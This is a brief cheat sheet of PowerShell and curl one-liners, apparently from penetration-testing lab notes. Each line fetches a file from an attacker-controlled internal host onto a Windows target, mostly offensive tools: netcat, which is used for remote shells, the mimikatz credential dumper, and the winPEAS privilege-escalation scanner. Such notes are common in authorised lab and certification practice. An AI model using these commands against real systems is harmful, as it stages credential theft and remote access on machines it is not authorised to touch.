Powershell Commands:
powershell.exe -c (new-object System.Net.WebClient).DownloadFile('http://10.10.14.17/nc.exe','c:\temp\nc.exe')
powershell.exe -c (Start-BitsTransfer -Source "http://10.10.14.17/nc.exe -Destination C:\temp\nc.exe")
powershell.exe wget "http://10.10.14.17/nc.exe" -outfile "c:\temp\nc.exe"
Invoke-WebRequest -Uri http://10.10.14.186/mimikatz.exe -OutFile mimikatz.exe
curl http://10.10.14.17/winPEASx64.exe -o winpeas.exe
iwr http://192.168.119.203/test.pdf -OutFile test.pdf
See commands.